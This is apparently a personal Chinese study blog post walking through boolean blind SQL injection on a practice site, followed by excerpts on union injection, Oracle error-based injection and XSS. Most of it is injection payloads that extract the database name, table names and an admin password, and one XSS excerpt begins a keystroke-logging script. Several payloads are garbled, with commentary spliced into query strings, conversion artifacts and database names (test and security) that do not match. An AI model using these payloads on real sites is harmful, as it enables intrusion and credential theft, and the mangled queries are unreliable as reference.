盲注 那麼我們來了解一點盲注的語法
這裡面是語法的介紹
0x01第一步我們先判斷當前資料庫的長度
語法構造
/index.php?id=1%20and%20length((select%20database()))%3e3 正確
index.php?id=1 and length((select database()))>4 錯誤
那我們確定資料庫名字大於3不大於4 那麼資料庫長度就是4了
0x02爆資料庫名稱
www.php-sqli.net/index.php?id=1%20and%20ascii(substr((select%20database()),1,1))%3e1 正確
?id=1 and ascii(substr((select database()),1,1))>100 真確
id=1 and ascii(substr((select database()),1,1))>115正確
?id=1 and ascii(substr((select database()),1,1))>116 錯誤那我們得到資料庫的第乙個位置的資料的ascii是116 =>t
繼續爆第二個
?id=1 and ascii(substr((select database()),2,1))>100 正確
?id=1 and ascii(substr((select database()),2,1))>101 錯誤那麼第二個字母是 101=>e
繼續爆第三個
?id=1 and ascii(substr((select database()),3,1))>114 正確第三個字母 115=> s?id=1 and ascii(substr((select database()),3,1))>115 錯誤
第四個
?id=1 and ascii(substr((select database()),4,1))>115 真確第四個 => 116 t?id=1 and ascii(substr((select database()),4,1))>116 錯誤
那麼我們的資料庫的名稱應該是test
0x02爆表名
先判斷有多少個表
1' and (select count(*) from information_schema.tables where table_schem=database())>5#
這裡我不知道語法
然後第乙個表的長度
id=1 and length((select table_name from information_schema.tables where table_schema='test
' limit 0,1))>4
這裡可以看見正確
id=1 and length((select table_name from information_schema.tables where table_schema='test' limit 0,1))>5 錯誤那麼第乙個表長度為4
爆第乙個表的表名的第乙個字母
?id=1 and ascii(substr((select table_name from information_schema.tables where table_schema='security
' limit 0,1),1,1))>1 正確
?id=1 and ascii(substr((select table_name from information_schema.tables where table_schema='security
' limit 0,1),1,1))>100 正確
?id=1 and ascii(substr((select table_name from information_schema.tables where table_schema='那麼這裡我們知道表名的第乙個之母是101=>esecurity
' limit 0,1),1,1))>101 錯誤
第二個字母的爆破
?id=1 and ascii(substr((select table_name from information_schema.tables where table_schema='security
' limit 0,1),2,1))>108 正確
?id=1 and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),2,1))>109 錯誤那麼第二個字母 =>109 m
爆到這裡不爆了 大概是email
我們開始爆破第二個表
?id=1 and ascii(substr((select table_name from information_schema.tables where table_schema='第乙個字母是114=>rsecurity
' limit 1,1),1,1))>100 正確
id=1 and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 1,1),1,1))>114 錯誤
id=1 and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 1,1),1,1))>113 正確
不是admin不想要
第三個表
id=1 and ascii(substr((select table_name from information_schema.tables where table_schema='第乙個字母 117=> usecurity
' limit 2,1),1,1))>116 正確
id=1 and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 2,1),1,1))>117 錯誤
這個人肯定是users表 不多bb了盲注太煩了直接爆 列名
臥槽 庫名是test 我要寫成security 打錯特錯
0x03爆列名
操作和爆破表名的操作是一樣的
這裡我們爆破出來是 username 和password
0x04爆欄位
password
ascii(substr((select password from admin limit 0,1),1,1))>1查內容 我們在查我們的密碼 在admin表裡面的password列裡面
大哥帶我們的mysql注入
這是今天的任務union select 查詢語句 第一步是先構造閉合 加入單引號報錯 然後 更據and 1 1 and1 2看是字元型還是布林型注入 www.薩達所大大所多t index.php?id 1 20order 20by 205 資料庫test查詢所有資料庫 要求是讀取web埠的admin...
大哥帶的Orchel資料庫的報錯注入
0x01 使用報錯注入需要使用類似 1 報錯語句 1 報錯語句 使用比較運算子,這樣的方式進行報錯注入 mysql僅使用函式報錯即可 類似mssql報錯注入的方式。news.jsp?id 1 and 1 1 正確news.jsp?id 1 and 1 2 錯誤 存在注入 隨便輸入 發現存在報錯資訊我...
大哥帶的XSS練習
0x01反射型 可以看見什麼都沒有過濾 0x02儲存型xss 那麼可以看見也是成功了 那我們試試可不可以順著網線搞一下組員吶?算了 沒得伺服器 搞搞自己吧 document.onkeypress function evt key post key logfile keylog.txt fp fope...